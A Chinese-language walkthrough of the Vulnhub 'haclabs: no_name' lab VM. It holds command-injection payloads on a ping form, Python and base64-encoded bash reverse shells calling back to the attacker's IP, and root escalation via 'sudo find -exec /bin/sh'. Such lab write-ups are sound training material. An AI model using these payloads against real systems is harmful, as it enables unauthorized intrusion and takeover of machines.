Vulnhub Haclabs No Name靶机解题详细过程
HL
靶机信息
名称: haclabs: no_name
地址:https://www.vulnhub.com/entry/haclabs-no_name,429/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:38:93:68 1 60 PCS Systemtechnik GmbH
192.168.56.164 08:00:27:c3:95:0d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.164 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 20:12 EST
Nmap scan report for bogon (192.168.56.164)
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:C3:95:0D (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.60 seconds
目标主机只有一个开放端口:80(http服务)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ curl http://192.168.56.164
<h4>Fake Admin Area</h4>
<form action="index.php" method="post">
<input type="text" placeholder="fake query" name="box">
<input type="submit" placeholder="Run" value="submit" name="submitt">
</form>
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ curl http://192.168.56.164/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.164 Port 80</address>
</body></html>
</html>
<!--passphrase:harder-->
返回页面提示口令: harder,但是这是什么的口令?先搁置一下,扫描一下目标站点有什么目录或者文件:
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 20:53:07 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 200) [Size: 417]
/server-status (Status: 403) [Size: 279]
Progress: 219282 / 220561 (99.42%)===============================================================
2022/11/08 20:53:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ nikto -h http://192.168.56.164
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.164
+ Target Hostname: 192.168.56.164
+ Target Port: 80
+ Start Time: 2022-11-08 20:53:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-08 20:54:35 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,sh,txt,html
[+] Timeout: 10s
===============================================================
2022/11/08 20:54:49 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 201]
/admin (Status: 200) [Size: 417]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1099098 / 1102805 (99.66%)===============================================================
2022/11/08 20:57:11 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ dirb http://192.168.56.164
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 8 20:57:50 2022
URL_BASE: http://192.168.56.164/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.164/ ----
+ http://192.168.56.164/admin (CODE:200|SIZE:417)
+ http://192.168.56.164/index.php (CODE:200|SIZE:201)
+ http://192.168.56.164/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Tue Nov 8 20:57:51 2022
DOWNLOADED: 4612 - FOUND: 3
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ dirb http://192.168.56.164/admin
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 8 20:57:57 2022
URL_BASE: http://192.168.56.164/admin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.164/admin/ ----
-----------------
END_TIME: Tue Nov 8 20:57:58 2022
DOWNLOADED: 4612 - FOUND: 0
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ gobuster dir -u http://192.168.56.164/admin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164/admin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: sh,txt,html,php
[+] Timeout: 10s
===============================================================
2022/11/08 20:58:15 Starting gobuster in directory enumeration mode
===============================================================
Progress: 1101266 / 1102805 (99.86%)===============================================================
2022/11/08 21:00:30 Finished
===============================================================
因为/admin页面有三张图片,口令是否与这三张图片相关,下载图片到Kali Linux本地,用该口令可以打开其中一张图片,结果是base64编码,解码后得到目录:
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ ls
haclabs.jpeg new.jpg nmap_full_scan Short.png
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ steghide extract -sf haclabs.jpeg
Enter passphrase:
wrote extracted data to "imp.txt".
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ ls
haclabs.jpeg imp.txt new.jpg nmap_full_scan Short.png
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ cat imp.txt
c3VwZXJhZG1pbi5waHA=
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ steghide extract -sf new.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ steghide extract -sf Short.png
Enter passphrase:
steghide: the file format of the file "Short.png" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ echo "c3VwZXJhZG1pbi5waHA=" | base64 -d
superadmin.php
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$
在Kali Linux访问该页面,发现这是管理员执行命令的页面
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ curl http://192.168.56.164/superadmin.php
<form method="post" action="">
<input type="text" placeholder="Enter an IP to ping" name="pinger">
<br>
<input type="submit" name="submitt">
</form>
显然需要看有没有命令注入漏洞,因为这个页面不是Fake ping,而是真正可以实现Ping, 至少这次可以ping 到127.0.0.1
尝试127.0.0.1;id, 发现没有任何反应
尝试127.0.0.1&&id,也没有结果
尝试127.0.0.1||id, 执行了前面部分,但是id没有输出
输入一个不通的IP地址2.2.2.2||id, 发现有反馈结果,
接下来看能不能获得反向shell
用命令尝试: 2.2.2.2||which nc,没有反馈结果,表明目标主机没有nc
用命令尝试: 2.2.2.2||which python,没有反馈结果,表明目标主机python2
用命令尝试: 2.2.2.2||which python3,返回/usr/bin/python3,表明目标主机有Python3
因此可以基于Python3设法建立反向shell
python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); v_ip="192.168.56.137"; s.connect((v_ip,5555)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); v_shell_path="/usr/bin/bash";v_shell_value="-i"; p=subprocess.call([v_shell_path,v_shell_value]);'
失败!
试了很多reverse shell的语句都失败
看了其他人的方法,需要用base64编码shell语句,从而绕开过滤
2.2.2.2||echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzNy81NTU1IDA+JjEK |base64 -d |bash
注意最后还需要管道给bash,否则只是解码出reverse shell语句,并没有执行
┌──(kali㉿kali)-[~/Vulnhub/HL]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.164] 56930
bash: cannot set terminal process group (668): Inappropriate ioctl for device
bash: no job control in this shell
www-data@haclabs:/var/www/html$
在Kali Linux成功得到了目标主机的shell
www-data@haclabs:/home$ ls
ls
haclabs
yash
www-data@haclabs:/home$ cd haclabs
cd haclabs
www-data@haclabs:/home/haclabs$ ls -alh
ls -alh
total 80K
drwxr-xr-x 16 haclabs haclabs 4.0K Feb 15 2020 .
drwxr-xr-x 4 root root 4.0K Jan 27 2020 ..
-rw------- 1 haclabs haclabs 2.6K Jan 30 2020 .ICEauthority
-rw-r--r-- 1 haclabs haclabs 3.7K Jan 27 2020 .bashrc
drwx------ 13 haclabs haclabs 4.0K Feb 9 2020 .cache
drwx------ 11 haclabs haclabs 4.0K Jan 27 2020 .config
drwx------ 3 haclabs haclabs 4.0K Jan 27 2020 .gnupg
drwx------ 3 haclabs haclabs 4.0K Jan 27 2020 .local
drwx------ 5 haclabs haclabs 4.0K Jan 27 2020 .mozilla
-rw-r--r-- 1 haclabs haclabs 807 Jan 27 2020 .profile
drwx------ 2 haclabs haclabs 4.0K Jan 27 2020 .ssh
-rw-r--r-- 1 haclabs haclabs 0 Jan 27 2020 .sudo_as_admin_successful
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Desktop
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Documents
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Downloads
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Music
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Pictures
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Public
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Templates
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Videos
-rw-r--r-- 1 root root 152 Jan 30 2020 flag2.txt
www-data@haclabs:/home/haclabs$ cat flag2.txt
cat flag2.txt
I am flag2
--------------- ----------------
--------
www-data@haclabs:/home/haclabs$ cd ..
cd ..
www-data@haclabs:/home$ ls
ls
haclabs
yash
www-data@haclabs:/home$ cd yash
cd yash
www-data@haclabs:/home/yash$ ls -alh
ls -alh
total 36K
drwxr-xr-x 5 yash yash 4.0K Feb 15 2020 .
drwxr-xr-x 4 root root 4.0K Jan 27 2020 ..
-rw------- 1 yash yash 13 Feb 15 2020 .bash_history
-rw-r--r-- 1 yash yash 3.7K Jan 27 2020 .bashrc
drwx------ 2 yash yash 4.0K Feb 9 2020 .cache
drwx------ 3 yash yash 4.0K Jan 27 2020 .gnupg
drwxrwxr-x 3 yash yash 4.0K Jan 27 2020 .local
-rw-r--r-- 1 yash yash 807 Jan 27 2020 .profile
-rw-rw-r-- 1 yash yash 77 Jan 30 2020 flag1.txt
www-data@haclabs:/home/yash$ cat flag1.txt
cat flag1.txt
Due to some security issues,I have saved haclabs password in a hidden file.
www-data@haclabs:/home/yash$ cat .bash_history
cat .bash_history
cat: .bash_history: Permission denied
www-data@haclabs:/home/yash$ cd ..
cd ..
www-data@haclabs:/home$ ls
ls
haclabs
yash
www-data@haclabs:/home$ cd haclabs
cd haclabs
www-data@haclabs:/home/haclabs$ ls -alh
ls -alh
total 80K
drwxr-xr-x 16 haclabs haclabs 4.0K Feb 15 2020 .
drwxr-xr-x 4 root root 4.0K Jan 27 2020 ..
-rw------- 1 haclabs haclabs 2.6K Jan 30 2020 .ICEauthority
-rw-r--r-- 1 haclabs haclabs 3.7K Jan 27 2020 .bashrc
drwx------ 13 haclabs haclabs 4.0K Feb 9 2020 .cache
drwx------ 11 haclabs haclabs 4.0K Jan 27 2020 .config
drwx------ 3 haclabs haclabs 4.0K Jan 27 2020 .gnupg
drwx------ 3 haclabs haclabs 4.0K Jan 27 2020 .local
drwx------ 5 haclabs haclabs 4.0K Jan 27 2020 .mozilla
-rw-r--r-- 1 haclabs haclabs 807 Jan 27 2020 .profile
drwx------ 2 haclabs haclabs 4.0K Jan 27 2020 .ssh
-rw-r--r-- 1 haclabs haclabs 0 Jan 27 2020 .sudo_as_admin_successful
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Desktop
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Documents
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Downloads
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Music
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Pictures
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Public
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Templates
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 Videos
-rw-r--r-- 1 root root 152 Jan 30 2020 flag2.txt
www-data@haclabs:/home/haclabs$ cd .config
cd .config
bash: cd: .config: Permission denied
www-data@haclabs:/home/haclabs$ cd Desktop
cd Desktop
www-data@haclabs:/home/haclabs/Desktop$ ls -alh
ls -alh
total 8.0K
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 .
drwxr-xr-x 16 haclabs haclabs 4.0K Feb 15 2020 ..
www-data@haclabs:/home/haclabs/Desktop$ cd ..
cd ..
www-data@haclabs:/home/haclabs$ cd Documents
cd Documents
www-data@haclabs:/home/haclabs/Documents$ ls -alh
ls -alh
total 8.0K
drwxr-xr-x 2 haclabs haclabs 4.0K Jan 27 2020 .
drwxr-xr-x 16 haclabs haclabs 4.0K Feb 15 2020 ..
www-data@haclabs:/home/haclabs/Documents$ cd ..
cd ..
www-data@haclabs:/home/haclabs$ cat .ICEauthority
cat .ICEauthority
cat: .ICEauthority: Permission denied
www-data@haclabs:/home/haclabs$
提示作者把haclabs的密码隐藏在某个文件了。
而且这个文件是被yash隐藏的,因此用find命令查找所有率属于yash用户的文件,从而找到了上述的隐藏文件,也就是laclabs的密码。
www-data@haclabs:/home/haclabs$ find / -type f -user yash 2>/dev/null
find / -type f -user yash 2>/dev/null
/home/yash/flag1.txt
/home/yash/.bashrc
/home/yash/.cache/motd.legal-displayed
/home/yash/.profile
/home/yash/.bash_history
/usr/share/hidden/.passwd
www-data@haclabs:/home/haclabs$ cat /usr/share/hidden/.passwd
cat /usr/share/hidden/.passwd
haclabs1234
www-data@haclabs:/home/haclabs$ su - haclabs
su - haclabs
su: must be run from a terminal
www-data@haclabs:/home/haclabs$ bash -i
bash -i
bash: cannot set terminal process group (668): Inappropriate ioctl for device
bash: no job control in this shell
www-data@haclabs:/home/haclabs$ su - haclabs
su - haclabs
su: must be run from a terminal
www-data@haclabs:/home/haclabs$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<abs$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@haclabs:/home/haclabs$ su -haclabs
su -haclabs
Usage: su [options] [LOGIN]
Options:
-c, --command COMMAND pass COMMAND to the invoked shell
-h, --help display this help message and exit
-, -l, --login make the shell a login shell
-m, -p,
--preserve-environment do not reset environment variables, and
keep the same shell
-s, --shell SHELL use SHELL instead of the default in passwd
www-data@haclabs:/home/haclabs$ su haclabs
su haclabs
Password: haclabs1234
haclabs@haclabs:~$ id
id
uid=1000(haclabs) gid=1000(haclabs) groups=1000(haclabs),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
haclabs@haclabs:~$ sudo -l
sudo -l
Matching Defaults entries for haclabs on haclabs:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User haclabs may run the following commands on haclabs:
(root) NOPASSWD: /usr/bin/find
haclabs@haclabs:~$ sudo find . -exec /bin/sh \; -quit
sudo find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
flag3.txt
# cat flag3.txt
cat flag3.txt
Congrats!!!You completed the challenege!
() ()
\ /
----------
#
成功拿到root flag!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
